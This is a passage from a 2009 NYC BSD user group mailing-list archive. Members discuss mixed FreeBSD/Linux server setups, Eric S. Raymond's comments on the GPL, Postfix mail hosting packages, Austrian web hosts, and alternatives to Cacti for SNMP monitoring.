1) FreeBSD 7.1 - utility boxes (DNS, Monitoring, minor web hosts/documentation)
2) Java hosts - Ubuntu (yes, the irony of *me* using Java on Linux is not lost on me, but essentially, it's how it was, the idea is in the back of my mind to change that)
3) DB hosts - all except for pgsql are on Solaris 10. pgsql is on a linux box.

-Trish

From kacanski_s at yahoo.com Mon Mar 23 21:52:05 2009
From: kacanski_s at yahoo.com (Aleksandar Kacanski)
Date: Mon, 23 Mar 2009 18:52:05 -0700 (PDT)
Subject: [nycbug-talk] Mixed RHEL / FreeBSD environment
In-Reply-To:
References:
Message-ID: <366347.15166.qm@web53606.mail.re2.yahoo.com>

> Hi all,
>
> Has anyone ever tried a mixed RHEL and FreeBSD environment? We're 100% RHEL right now, but migrating to a new data center. Considering the options and the amount of BSD fans in the mix, we'd like to switch at least the lower trafficked boxes (utility boxes, jump boxes, etc.) to FreeBSD. We are also debating making our webs FreeBSD, because of some research that shows Apache seems to run nicely on FreeBSD compared to RHEL (if not better in certain circumstances).
>
> 100% FreeBSD is not an option, for the fact that for now, we're going to keep our database boxes (which will only have a LAN connection) RHEL. This is because of the recent issues with FreeBSD and MySQL performance vs. RHEL. We've done our own testing, and have had good results, but feel like coupling a data center migration AND an OS change on the DB servers (where we are most likely to have performance problems) is too many changes at once.
>
> What are everyone's thoughts? Is a potentially mixed environment like this potentially beneficial? Stupid? I'm also very curious to know of people's research on Apache/PHP with FreeBSD vs. Linux.
>
> Thanks,
>
> Matt

Hi Matt,

I have been very happy with openBSD as a border secure services, email, virus gateways for email and front end web proxy servers. I use gentoo for web services internal email, ldap directories and stuff like that. Freebsd for storage, firewalls and open source databases. Sun intel and sparc I use in mixed HPC and web service arrangements. I got really great results with cool threads and apache, but I have also been very successful with tuning apache with linux.

For me in mixed environment only manageable solution is not relying on default packaging and making my own application "portals" that i can compile and build according to base I am installing on ...

hope this helps ...

From akosela at andykosela.com Tue Mar 24 04:43:21 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Tue, 24 Mar 2009 09:43:21 +0100
Subject: [nycbug-talk] Mixed RHEL / FreeBSD environment
In-Reply-To:
References:
Message-ID: <49c89d29.86vM6jaGs+Ex+qud%akosela@andykosela.com>

Matt Juszczak wrote:
> Hi all,
>
> Has anyone ever tried a mixed RHEL and FreeBSD environment? We're 100%
> RHEL right now, but migrating to a new data center. Considering the
> options and the amount of BSD fans in the mix, we'd like to switch at
> least the lower trafficked boxes (utility boxes, jump boxes, etc.) to
> FreeBSD. We are also debating making our webs FreeBSD, because of some
> research that shows Apache seems to run nicely on FreeBSD compared to RHEL
> (if not better in certain circumstances).
>
> 100% FreeBSD is not an option, for the fact that for now, we're going to
> keep our database boxes (which will only have a LAN connection) RHEL.
> This is because of the recent issues with FreeBSD and MySQL performance
> vs. RHEL. We've done our own testing, and have had good results, but feel
> like coupling a data center migration AND an OS change on the DB servers
> (where we are most likely to have performance problems) is too many
> changes at once.
>
> What are everyone's thoughts? Is a potentially mixed environment like
> this potentially beneficial? Stupid? I'm also very curious to know of
> people's research on Apache/PHP with FreeBSD vs. Linux.

Hi Matt,

Can you elaborate more on the MySQL low performance on FreeBSD 7? From my own tests the LAMP or rather FAMP infrastructure works very well on FreeBSD. The performance issue is not only connected with OS per se, but also overall planning of the whole infrastructure (hardware, HA, load balancing, etc.), so it's a much more complex issue than simply FreeBSD vs. RHEL.

We are trying to use Linux only on hosts that basically need it, e.g. Oracle databases, OAS, multipathing to HP EVA/XP disk arrays, special Linux oriented applications, etc. For the rest of the servers in DMZ, FreeBSD is the only viable option. I am very happy with it for the x86_64 architecture.

Internally we use also HP-UX and are extremely happy with its performance and maintenance. IMHO it's much better for large scale Oracle DBs or SAP than RHEL.

--Andy

From skreuzer at exit2shell.com Tue Mar 24 08:52:16 2009
From: skreuzer at exit2shell.com (Steven Kreuzer)
Date: Tue, 24 Mar 2009 08:52:16 -0400
Subject: [nycbug-talk] Eric S. Raymond speaks heresy
Message-ID:

Eric S. Raymond spoke at the Long Island Linux Users Group not too long ago and I found a blog post from someone who was at the talk. According to him the GPL and other viral licenses are no longer needed as they do more harm than good to the community.

"One of my heretical opinions is that we worry way too much about licensing. And in particular; I don't think we really need reciprocal licensing. I don't think we need licenses like the GPL, that punish people for taking code closed-source."
He then went on to say that the BSD style licenses are a better alternative to the GPL

The entire transcript of that portion of the talk can be found at http://dotcommie.net//feed/index.php?id=160 and video of the entire talk can be found at http://www.archive.org/details/LILUG_20090310_ESR

--
Steven Kreuzer
http://www.exit2shell.com/~skreuzer

From trish at bsdunix.net Tue Mar 24 09:54:02 2009
From: trish at bsdunix.net (Siobhan Lynch)
Date: Tue, 24 Mar 2009 09:54:02 -0400
Subject: [nycbug-talk] Eric S. Raymond speaks heresy
In-Reply-To:
References:
Message-ID: <49C8E5FA.2030702@bsdunix.net>

On 3/24/09 8:52 AM, Steven Kreuzer wrote:
> Eric S. Raymond spoke at the Long Island Linux Users Group not too long
> ago and I found a blog post from someone who was at the talk.
> According to him the GPL and other viral licenses are no longer needed
> as they do more harm than good to the community.
>
> "One of my heretical opinions is that we worry way too much about
> licensing. And in particular; I don't think we really need reciprocal
> licensing. I don't think we need licenses like the GPL, that punish
> people for taking code closed-source."
>
> He then went on to say that the BSD style licenses are a better
> alternative to the GPL
>

This is very interesting, since back in the late 90's, Eric and I used to have dinner with each other about 3-4 times a year. During this time, I was one of those rabid BSD zealots, and he was a staunch GPL/Linux advocate.

Eric and I got along well, we agreed on many things, such as gun control, polyamory, science fiction, regional dialecticism - but the one thing we always agreed to disagree on (but always talked rationally and calmly about) - was the merits of both licensing schemes. He was primarily a GPL advocate, and I was a BSD advocate.

It's nice to know that in the past 8-10 years or so, he's come around to my way of thinking.... however I'm less rabid (and less active) than I used to be.

-Trish

> The entire transcript of that portion of the talk can be found at http://dotcommie.net//feed/index.php?id=160
> and video of the entire talk can be found at http://www.archive.org/details/LILUG_20090310_ESR
>
> --
> Steven Kreuzer
> http://www.exit2shell.com/~skreuzer
>

From carton at Ivy.NET Tue Mar 24 14:20:33 2009
From: carton at Ivy.NET (Miles Nordin)
Date: Tue, 24 Mar 2009 14:20:33 -0400
Subject: [nycbug-talk] Eric S. Raymond speaks heresy
In-Reply-To: (Steven Kreuzer's message of "Tue, 24 Mar 2009 08:52:16 -0400")
References:
Message-ID:

>>>>> "sk" == Steven Kreuzer writes:

    sk> He then went on to say that the BSD style licenses are a
    sk> better alternative to the GPL

okay yes, and THEN what happened? It was just starting to get interesting when you stopped the story. How did he manage to get out of the building? I'm guessing there was no beer after?

From skreuzer at exit2shell.com Tue Mar 24 14:41:40 2009
From: skreuzer at exit2shell.com (Steven Kreuzer)
Date: Tue, 24 Mar 2009 14:41:40 -0400
Subject: [nycbug-talk] Eric S. Raymond speaks heresy
In-Reply-To:
References:
Message-ID:

On Mar 24, 2009, at 2:20 PM, Miles Nordin wrote:

>>>>>> "sk" == Steven Kreuzer writes:
>
> sk> He then went on to say that the BSD style licenses are a
> sk> better alternative to the GPL
>
> okay yes, and THEN what happened? It was just starting to get
> interesting when you stopped the story. How did he manage to get out
> of the building? I'm guessing there was no beer after?

Eric pulled out a Colt M1991A Officer's Model semiautomatic pistol and fired a warning shot into the air. Things got pretty hectic after that. Sadly, no one was up for a beer afterwards.

--
Steven Kreuzer
http://www.exit2shell.com/~skreuzer

From quigongene at gmail.com Tue Mar 24 14:42:40 2009
From: quigongene at gmail.com (gene cronk)
Date: Tue, 24 Mar 2009 14:42:40 -0400
Subject: [nycbug-talk] Eric S. Raymond speaks heresy
In-Reply-To:
References:
Message-ID: <7bb72ca70903241142p3b8f222dh62afd1362c1159b4@mail.gmail.com>

2009/3/24 Miles Nordin

> >>>>> "sk" == Steven Kreuzer writes:
>
> sk> He then went on to say that the BSD style licenses are a
> sk> better alternative to the GPL
>
> okay yes, and THEN what happened? It was just starting to get
> interesting when you stopped the story. How did he manage to get out
> of the building? I'm guessing there was no beer after?
>
>

I gave a talk at their venue while I was up there in late 2007. They're actually very open minded and BSD friendly for a LUG.

From spork at bway.net Wed Mar 25 00:56:17 2009
From: spork at bway.net (Charles Sprickman)
Date: Wed, 25 Mar 2009 00:56:17 -0400 (EDT)
Subject: [nycbug-talk] Current email "toaster" packages?
Message-ID:

Hi all,

I have a pet project to try out the various "pop toaster" or virtual domain email setups out there again. First for my own junk that I'm moving to another server and then if I find something stellar, I'd like to ditch qmail+vpopmail when I migrate another larger email server to new hardware.

It's been a very long time since I looked at this stuff. I'm done with Qmail for this sort of thing. I'm looking for something Postfix-based just so I'm running something a bit more modern. Looking for db auth, a nice web frontend for self-managed domains, and easy integration with spamasss preferences living in a db.

Any suggestions?

Thanks,

Charles

From max at neuropunks.org Wed Mar 25 11:50:33 2009
From: max at neuropunks.org (Max Gribov)
Date: Wed, 25 Mar 2009 11:50:33 -0400
Subject: [nycbug-talk] Current email "toaster" packages?
In-Reply-To:
References:
Message-ID: <49CA52C9.3030201@neuropunks.org>

Charles Sprickman wrote:
> It's been a very long time since I looked at this stuff. I'm done with
> Qmail for this sort of thing. I'm looking for something Postfix-based
> just so I'm running something a bit more modern. Looking for db auth, a
> nice web frontend for self-managed domains, and easy integration with
> spamasss preferences living in a db.
>
>

postfix admin (http://sourceforge.net/projects/postfixadmin/) is pretty good, it allows you to manage mailboxes and as long as your postfix, imap server and sasl auth are set up to use its db, it works nicely.

I don't believe it has any plugins to manage spam filtering though. Our setup doesn't allow users to change their spam settings, and we rely on their client software to move things with ***SPAM*** in the subject/headers to their junkmail. I heard maildrop has some gui interfaces to manage rules like that on the server, but haven't had luck getting it to work right (yet)

It's in php and it's really easy to hack, i just hacked our copy to manage svn access for the people with mailboxes (it flips a flag in mailbox table and apache/dav+svn auth off of that)

If you google for that software, you'll find plenty of howto's as well.

> Any suggestions?
>
> Thanks,
>
> Charles
>

From george at ceetonetechnology.com Wed Mar 25 21:46:27 2009
From: george at ceetonetechnology.com (George Rosamond)
Date: Wed, 25 Mar 2009 21:46:27 -0400
Subject: [nycbug-talk] Austrian hosting
Message-ID: <49CADE73.90502@ceetonetechnology.com>

Anyone know any www hosting providers in Austria?

Thanks

George

From matt at atopia.net Wed Mar 25 22:04:00 2009
From: matt at atopia.net (Matt Juszczak)
Date: Wed, 25 Mar 2009 22:04:00 -0400 (EDT)
Subject: [nycbug-talk] Webhosting?
Message-ID:

Anyone want 10-20 paying webhosting customers? If so, please contact me off list. Moving to move out of the "market".

-M

From brian.gupta at gmail.com Thu Mar 26 04:06:00 2009
From: brian.gupta at gmail.com (Brian Gupta)
Date: Thu, 26 Mar 2009 04:06:00 -0400
Subject: [nycbug-talk] Austrian hosting
In-Reply-To: <49CADE73.90502@ceetonetechnology.com>
References: <49CADE73.90502@ceetonetechnology.com>
Message-ID: <5b5090780903260106u75cf7001offc3ae2699cc5a5@mail.gmail.com>

Overheard : "bgupta, you could try sil.at - many austrians choose hosting in .de i was just told"

-Brian

On Wed, Mar 25, 2009 at 9:46 PM, George Rosamond wrote:
> Anyone know any www hosting providers in Austria?
>
> Thanks
>
> George

--
- Brian Gupta
New York City user groups calendar: http://nyc.brandorr.com/

From george at ceetonetechnology.com Thu Mar 26 08:12:46 2009
From: george at ceetonetechnology.com (George Rosamond)
Date: Thu, 26 Mar 2009 08:12:46 -0400
Subject: [nycbug-talk] Austrian hosting
In-Reply-To: <5b5090780903260106u75cf7001offc3ae2699cc5a5@mail.gmail.com>
References: <49CADE73.90502@ceetonetechnology.com> <5b5090780903260106u75cf7001offc3ae2699cc5a5@mail.gmail.com>
Message-ID: <49CB713E.2040909@ceetonetechnology.com>

Brian Gupta wrote:
> Overheard : "bgupta, you could try sil.at - many austrians choose
> hosting in .de i was just told"
>

Hmmmm. . . that's surprising since i know the .de laws are increasingly pretty brutal in terms of logging AFAIK. That's what i've picked up on the tor list.

I think .at is the one country I don't know of providers in in the whole of .eu.

Got a swarm of followups (but with nothing too real yet) offlist.

Appreciated.

And a few of you gave me a good morning laugh.

Found this list the obvious way

http://www.web-hosting-top.com/web-hosting/top.10-google-pagerank/country-target/at/austria

but forwarded sil.at

g

From brian.gupta at gmail.com Thu Mar 26 14:26:06 2009
From: brian.gupta at gmail.com (Brian Gupta)
Date: Thu, 26 Mar 2009 14:26:06 -0400
Subject: [nycbug-talk] Austrian hosting
In-Reply-To: <49CB713E.2040909@ceetonetechnology.com>
References: <49CADE73.90502@ceetonetechnology.com> <5b5090780903260106u75cf7001offc3ae2699cc5a5@mail.gmail.com> <49CB713E.2040909@ceetonetechnology.com>
Message-ID: <5b5090780903261126s389e16dm369c0ceb1fce974c@mail.gmail.com>

I was told it is a cost issue. The Austrian providers are, as a rule, more expensive, so many people go across the border.

On Thu, Mar 26, 2009 at 8:12 AM, George Rosamond wrote:
> Brian Gupta wrote:
>>
>> Overheard : "bgupta, you could try sil.at - many austrians choose
>> hosting in .de i was just told"
>>
>
> Hmmmm. . . that's surprising since i know the .de laws are increasingly
> pretty brutal in terms of logging AFAIK.  That's what i've picked up on the
> tor list.
>
> I think .at is the one country I don't know of providers in in the whole of
> .eu.
>
> Got a swarm of followups (but with nothing too real yet) offlist.
>
> Appreciated.
>
> And a few of you gave me a good morning laugh.
>
> Found this list the obvious way
>
> http://www.web-hosting-top.com/web-hosting/top.10-google-pagerank/country-target/at/austria
>
> but forwarded sil.at
>
> g
>

--
- Brian Gupta
New York City user groups calendar: http://nyc.brandorr.com/

From pete at nomadlogic.org Thu Mar 26 14:29:48 2009
From: pete at nomadlogic.org (Pete Wright)
Date: Thu, 26 Mar 2009 11:29:48 -0700
Subject: [nycbug-talk] Cacti Replacement
Message-ID: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org>

Hey All,
Wondering if anyone has seen a replacement for cacti. Specifically I'm looking for an easy to use snmp enabled graphing application.
Cacti is great if you have a handful of hosts and don't mind doing everything by hand - but I'm finding its scripting ability is pretty lacking. While there are other nice tools out there for plotting network and system performance - most of them seem to require an agent (ganglia for example).

i'd like to have a consolidated plotting app so i can plot my app servers, db's, switches, pdu's etc.

cheers,
-pete

From riegersteve at gmail.com Thu Mar 26 14:38:23 2009
From: riegersteve at gmail.com (Steve Rieger)
Date: Thu, 26 Mar 2009 11:38:23 -0700
Subject: [nycbug-talk] Cacti Replacement
In-Reply-To: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org>
References: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org>
Message-ID: <49CBCB9F.1060303@gmail.com>

Pete Wright wrote:
> Hey All,
> Wondering if anyone has seen a replacement for cacti. Specifically
> I'm looking for an easy to use snmp enabled graphing application.
> Cacti is great if you have a handful of hosts and don't mind doing
> everything by hand - but I'm finding its scripting ability is pretty
> lacking. While there are other nice tools out there for plotting
> network and system performance - most of them seem to require an agent
> (ganglia for example).
>

zabbix is easier and fully templated

From pete at nomadlogic.org Thu Mar 26 14:41:05 2009
From: pete at nomadlogic.org (Pete Wright)
Date: Thu, 26 Mar 2009 11:41:05 -0700
Subject: [nycbug-talk] Cacti Replacement
In-Reply-To: <49CBCB9F.1060303@gmail.com>
References: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org> <49CBCB9F.1060303@gmail.com>
Message-ID: <7656E919-99F3-48C5-B316-6329757F876C@nomadlogic.org>

On 26-Mar-09, at 11:38 AM, Steve Rieger wrote:
> Pete Wright wrote:
>> Hey All,
>> Wondering if anyone has seen a replacement for cacti.
>> Specifically I'm looking for an easy to use snmp enabled graphing
>> application.
>> Cacti is great if you have a handful of hosts and
>> don't mind doing everything by hand - but I'm finding its
>> scripting ability is pretty lacking. While there are other nice
>> tools out there for plotting network and system performance - most
>> of them seem to require an agent (ganglia for example).
>
>
> zabbix is easier and fully templated
>
>

yea we are looking at that - does it support plotting via snmp? i was under the impression it relied on an agent.

cheers,
-p

From brian.gupta at gmail.com Thu Mar 26 15:00:16 2009
From: brian.gupta at gmail.com (Brian Gupta)
Date: Thu, 26 Mar 2009 15:00:16 -0400
Subject: [nycbug-talk] Cacti Replacement
In-Reply-To: <7656E919-99F3-48C5-B316-6329757F876C@nomadlogic.org>
References: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org> <49CBCB9F.1060303@gmail.com> <7656E919-99F3-48C5-B316-6329757F876C@nomadlogic.org>
Message-ID: <5b5090780903261200u1670b14bw2a3db9cff6413ce8@mail.gmail.com>

I've also heard mixed things about zenoss. Supposed to be like Nagios merged with Cacti, full SNMP. (Some love it, some find it a bit complicated to setup).

On Thu, Mar 26, 2009 at 2:41 PM, Pete Wright wrote:
>
> On 26-Mar-09, at 11:38 AM, Steve Rieger wrote:
>
>> Pete Wright wrote:
>>> Hey All,
>>> Wondering if anyone has seen a replacement for cacti.
>>> Specifically I'm looking for an easy to use snmp enabled graphing
>>> application. Cacti is great if you have a handful of hosts and
>>> don't mind doing everything by hand - but I'm finding its
>>> scripting ability is pretty lacking. While there are other nice
>>> tools out there for plotting network and system performance - most
>>> of them seem to require an agent (ganglia for example).
>>
>>
>> zabbix is easier and fully templated
>>
>>
>
> yea we are looking at that - does it support plotting via snmp? i was
> under the impression it relied on an agent.
>
> cheers,
> -p
> _______________________________________________
> talk mailing list
> talk at lists.nycbug.org
> http://lists.nycbug.org/mailman/listinfo/talk
>

--
- Brian Gupta

New York City user groups calendar:
http://nyc.brandorr.com/

From pete at nomadlogic.org Thu Mar 26 15:03:54 2009
From: pete at nomadlogic.org (Pete Wright)
Date: Thu, 26 Mar 2009 12:03:54 -0700
Subject: [nycbug-talk] Cacti Replacement
In-Reply-To: <5b5090780903261200u1670b14bw2a3db9cff6413ce8@mail.gmail.com>
References: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org> <49CBCB9F.1060303@gmail.com> <7656E919-99F3-48C5-B316-6329757F876C@nomadlogic.org> <5b5090780903261200u1670b14bw2a3db9cff6413ce8@mail.gmail.com>
Message-ID: <1E03AA58-E547-41B3-9533-93E043B60864@nomadlogic.org>

On 26-Mar-09, at 12:00 PM, Brian Gupta wrote:
> I've also heard mixed things about zenoss. Supposed to be like Nagios
> merged with Cacti, full SNMP. (Some love it, some find it a bit
> complicated to setup).
>

yea - same here. I've chatted with peeps on irc that swear by it, then i meet people that complain that it's pretty hard to make it do things outside of its intended scope. and the UI is pretty cluttered i'd have to admit too. i believe it's built on top of zope, and the scripting framework is python which is actually a plus for me.

cheers!
-p

> On Thu, Mar 26, 2009 at 2:41 PM, Pete Wright
> wrote:
>>
>> On 26-Mar-09, at 11:38 AM, Steve Rieger wrote:
>>
>>> Pete Wright wrote:
>>>> Hey All,
>>>> Wondering if anyone has seen a replacement for cacti.
>>>> Specifically I'm looking for an easy to use snmp enabled graphing
>>>> application. Cacti is great if you have a handful of hosts and
>>>> don't mind doing everything by hand - but I'm finding its
>>>> scripting ability is pretty lacking. While there are other nice
>>>> tools out there for plotting network and system performance - most
>>>> of them seem to require an agent (ganglia for example).
>>>
>>>
>>> zabbix is easier and fully templated
>>>
>>>
>>
>> yea we are looking at that - does it support plotting via snmp? i
>> was
>> under the impression it relied on an agent.
>>
>> cheers,
>> -p
>> _______________________________________________
>> talk mailing list
>> talk at lists.nycbug.org
>> http://lists.nycbug.org/mailman/listinfo/talk
>>
>
>
>
>
> --
> - Brian Gupta
>
> New York City user groups calendar:
> http://nyc.brandorr.com/

From riegersteve at gmail.com Thu Mar 26 16:17:38 2009
From: riegersteve at gmail.com (Steve Rieger)
Date: Thu, 26 Mar 2009 13:17:38 -0700
Subject: [nycbug-talk] Cacti Replacement
In-Reply-To: <7656E919-99F3-48C5-B316-6329757F876C@nomadlogic.org>
References: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org> <49CBCB9F.1060303@gmail.com> <7656E919-99F3-48C5-B316-6329757F876C@nomadlogic.org>
Message-ID: <49CBE2E2.9020202@gmail.com>

Pete Wright wrote:
>
> On 26-Mar-09, at 11:38 AM, Steve Rieger wrote:
>
>> Pete Wright wrote:
>>> Hey All,
>>> Wondering if anyone has seen a replacement for cacti. Specifically
>>> I'm looking for an easy to use snmp enabled graphing application.
>>> Cacti is great if you have a handful of hosts and don't mind doing
>>> everything by hand - but I'm finding its scripting ability is
>>> pretty lacking. While there are other nice tools out there for
>>> plotting network and system performance - most of them seem to
>>> require an agent (ganglia for example).
>>
>>
>> zabbix is easier and fully templated
>>
>>
>
> yea we are looking at that - does it support plotting via snmp? i was
> under the impression it relied on an agent.
>
> cheers,
> -p

it does

can send screenshots if you so want.

or if you have webex can show you what we have setup
we monitor netapp filers without agents.
From pete at nomadlogic.org Thu Mar 26 17:01:49 2009
From: pete at nomadlogic.org (Pete Wright)
Date: Thu, 26 Mar 2009 14:01:49 -0700
Subject: [nycbug-talk] Cacti Replacement
In-Reply-To: <49CBE2E2.9020202@gmail.com>
References: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org> <49CBCB9F.1060303@gmail.com> <7656E919-99F3-48C5-B316-6329757F876C@nomadlogic.org> <49CBE2E2.9020202@gmail.com>
Message-ID: <3A8C2D48-15C2-4A90-929F-313D16E925F4@nomadlogic.org>

On 26-Mar-09, at 1:17 PM, Steve Rieger wrote:
> Pete Wright wrote:
>> On 26-Mar-09, at 11:38 AM, Steve Rieger wrote:
>>> Pete Wright wrote:
>>>> Hey All,
>>>> Wondering if anyone has seen a replacement for cacti.
>>>> Specifically I'm looking for an easy to use snmp enabled
>>>> graphing application. Cacti is great if you have a handful of
>>>> hosts and don't mind doing everything by hand - but I'm finding
>>>> its scripting ability is pretty lacking. While there are other
>>>> nice tools out there for plotting network and system performance
>>>> - most of them seem to require an agent (ganglia for example).
>>>
>>>
>>> zabbix is easier and fully templated
>>>
>>>
>> yea we are looking at that - does it support plotting via snmp? i
>> was under the impression it relied on an agent.
>> cheers,
>> -p
> it does
>
> can send screenshots if you so want.
>
> or if you have webex can show you what we have setup
> we monitor netapp filers without agents.

thanks steve. i trust ya :)

hearing that you are using it to monitor your netapps is exactly what i wanted to hear.

thanks!
-pete

From riegersteve at gmail.com Thu Mar 26 17:04:40 2009
From: riegersteve at gmail.com (Steve Rieger)
Date: Thu, 26 Mar 2009 14:04:40 -0700
Subject: [nycbug-talk] Cacti Replacement
In-Reply-To: <3A8C2D48-15C2-4A90-929F-313D16E925F4@nomadlogic.org>
References: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org> <49CBCB9F.1060303@gmail.com> <7656E919-99F3-48C5-B316-6329757F876C@nomadlogic.org> <49CBE2E2.9020202@gmail.com> <3A8C2D48-15C2-4A90-929F-313D16E925F4@nomadlogic.org>
Message-ID: <49CBEDE8.9090301@gmail.com>

Pete Wright wrote:
>> it does
>>
>> can send screenshots if you so want.
>>
>> or if you have webex can show you what we have setup
>> we monitor netapp filers without agents.
>
>
> thanks steve. i trust ya :)
>
> hearing that you are using it to monitor your netapps is exactly what i
> wanted to hear.
>
> thanks!
>
> -pete

i have various netapp templates that you can import
if you decide to go with zabbix

actually am giving a presentation for the unix association of southern cal on april 2

comparing the following (and displaying all of em, from install to go live)
hyperic
nimbus
nagios
zenoss
zabbix
cacti

From akosela at andykosela.com Thu Mar 26 17:11:50 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Thu, 26 Mar 2009 22:11:50 +0100
Subject: [nycbug-talk] Cacti Replacement
In-Reply-To: <49CBEDE8.9090301@gmail.com>
References: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org> <49CBCB9F.1060303@gmail.com> <7656E919-99F3-48C5-B316-6329757F876C@nomadlogic.org> <49CBE2E2.9020202@gmail.com> <3A8C2D48-15C2-4A90-929F-313D16E925F4@nomadlogic.org> <49CBEDE8.9090301@gmail.com>
Message-ID: <49cbef96.3QLo7K+79Eq4ghVd%akosela@andykosela.com>

Steve Rieger wrote:
> comparing the following (and displaying all of em, from install to go live)
> hyperic
> nimbus
> nagios
> zenoss
> zabbix
> cacti

Interesting. Would like to know the hyperic vs. zabbix differences to effectively monitor FreeBSD/Linux environment.
--Andy

From riegersteve at gmail.com Thu Mar 26 17:18:20 2009
From: riegersteve at gmail.com (Steve Rieger)
Date: Thu, 26 Mar 2009 14:18:20 -0700
Subject: [nycbug-talk] Cacti Replacement
In-Reply-To: <49cbef96.3QLo7K+79Eq4ghVd%akosela@andykosela.com>
References: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org> <49CBCB9F.1060303@gmail.com> <7656E919-99F3-48C5-B316-6329757F876C@nomadlogic.org> <49CBE2E2.9020202@gmail.com> <3A8C2D48-15C2-4A90-929F-313D16E925F4@nomadlogic.org> <49CBEDE8.9090301@gmail.com> <49cbef96.3QLo7K+79Eq4ghVd%akosela@andykosela.com>
Message-ID: <49CBF11C.90707@gmail.com>

Andy Kosela wrote:
> Steve Rieger wrote:
>
>> comparing the following (and displaying all of em, from install to go live)
>> hyperic
>> nimbus
>> nagios
>> zenoss
>> zabbix
>> cacti
>
> Interesting. Would like to know the hyperic vs. zabbix differences to
> effectively monitor FreeBSD/Linux environment.
>
> --Andy

how bout this,

i can open a conf line for the presentation.
i can definitely record it for yous all, and send out a url for the presentation files.
but in short,

zabbix is a one way solution
clients send data to mon_server
mon_server dont know nuttin about nuttin, and if any metric changes it will react based on whatever trigger you defined

hyperic requires two way comms (unless you want to pay $45 per monitored host)

From dave at donnerjack.com Thu Mar 26 17:20:10 2009
From: dave at donnerjack.com (David Lawson)
Date: Thu, 26 Mar 2009 17:20:10 -0400
Subject: [nycbug-talk] Cacti Replacement
In-Reply-To: <49CBEDE8.9090301@gmail.com>
References: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org> <49CBCB9F.1060303@gmail.com> <7656E919-99F3-48C5-B316-6329757F876C@nomadlogic.org> <49CBE2E2.9020202@gmail.com> <3A8C2D48-15C2-4A90-929F-313D16E925F4@nomadlogic.org> <49CBEDE8.9090301@gmail.com>
Message-ID: <7D4CF191-A34A-49F1-B608-C2BC8ACBD9D4@donnerjack.com>

> i have various netapp templates that you can import
> if you decide to go with zabbix
>
> actually am giving a presentation for the unix association of southern
> cal on april 2
>
> comparing the following (and displaying all of em, from install to
> go live)
> hyperic
> nimbus
> nagios
> zenoss
> zabbix
> cacti

Very cool, is there going to be video or a screencast or anything?

--Dave

From riegersteve at gmail.com Thu Mar 26 17:25:13 2009
From: riegersteve at gmail.com (Steve Rieger)
Date: Thu, 26 Mar 2009 14:25:13 -0700
Subject: [nycbug-talk] Cacti Replacement
In-Reply-To: <7D4CF191-A34A-49F1-B608-C2BC8ACBD9D4@donnerjack.com>
References: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org> <49CBCB9F.1060303@gmail.com> <7656E919-99F3-48C5-B316-6329757F876C@nomadlogic.org> <49CBE2E2.9020202@gmail.com> <3A8C2D48-15C2-4A90-929F-313D16E925F4@nomadlogic.org> <49CBEDE8.9090301@gmail.com> <7D4CF191-A34A-49F1-B608-C2BC8ACBD9D4@donnerjack.com>
Message-ID: <49CBF2B9.9090808@gmail.com>

David Lawson wrote:
>
> Very cool, is there going to be video or a screencast or anything?
>
> --Dave

am finding out

the group out here (i now live on the west coast) is called UUASC, on par with NYCBUG, and yup they heard of yous...

From bob at redivi.com Thu Mar 26 17:30:23 2009
From: bob at redivi.com (Bob Ippolito)
Date: Thu, 26 Mar 2009 16:30:23 -0500
Subject: [nycbug-talk] Cacti Replacement
In-Reply-To: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org>
References: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org>
Message-ID: <6a36e7290903261430t4d500304h4e04276c2441354a@mail.gmail.com>

On Thu, Mar 26, 2009 at 1:29 PM, Pete Wright wrote:
> Hey All,
> Wondering if anyone has seen a replacement for cacti. Specifically
> I'm looking for an easy to use snmp enabled graphing application.
> Cacti is great if you have a handful of hosts and don't mind doing
> everything by hand - but I'm finding its scripting ability is pretty
> lacking. While there are other nice tools out there for plotting
> network and system performance - most of them seem to require an agent
> (ganglia for example).
>
> i'd like to have a consolidated plotting app so i can plot my app
> servers, db's, switches, pdu's etc.

We're using OpenNMS, which seems to do all of this and a lot more (I did not configure it).
Not sure whether that's a good or a bad thing :)

-bob

From akosela at andykosela.com Thu Mar 26 17:45:52 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Thu, 26 Mar 2009 22:45:52 +0100
Subject: [nycbug-talk] Cacti Replacement
In-Reply-To: <49CBF11C.90707@gmail.com>
References: <5D6B56F3-D07D-4504-ABB2-A9A4736B5165@nomadlogic.org> <49CBCB9F.1060303@gmail.com> <7656E919-99F3-48C5-B316-6329757F876C@nomadlogic.org> <49CBE2E2.9020202@gmail.com> <3A8C2D48-15C2-4A90-929F-313D16E925F4@nomadlogic.org> <49CBEDE8.9090301@gmail.com> <49cbef96.3QLo7K+79Eq4ghVd%akosela@andykosela.com> <49CBF11C.90707@gmail.com>
Message-ID: <49cbf790.NPP7n9yN3ftpXXvI%akosela@andykosela.com>

Steve Rieger wrote:
> Andy Kosela wrote:
> > Steve Rieger wrote:
> >
> >> comparing the following (and displaying all of em, from install to go live)
> >> hyperic
> >> nimbus
> >> nagios
> >> zenoss
> >> zabbix
> >> cacti
> >
> > Interesting. Would like to know the hyperic vs. zabbix differences to
> > effectively monitor FreeBSD/Linux environment.
> >
> > --Andy
> how bout this,
>
> i can open a conf line for the presentation.
> i can definitely record it for yous all, and send out a url for the
> presentation files.

Yes, recording it would be perfect.

--Andy

From kacanski_s at yahoo.com Sun Mar 29 09:41:20 2009
From: kacanski_s at yahoo.com (Aleksandar Kacanski)
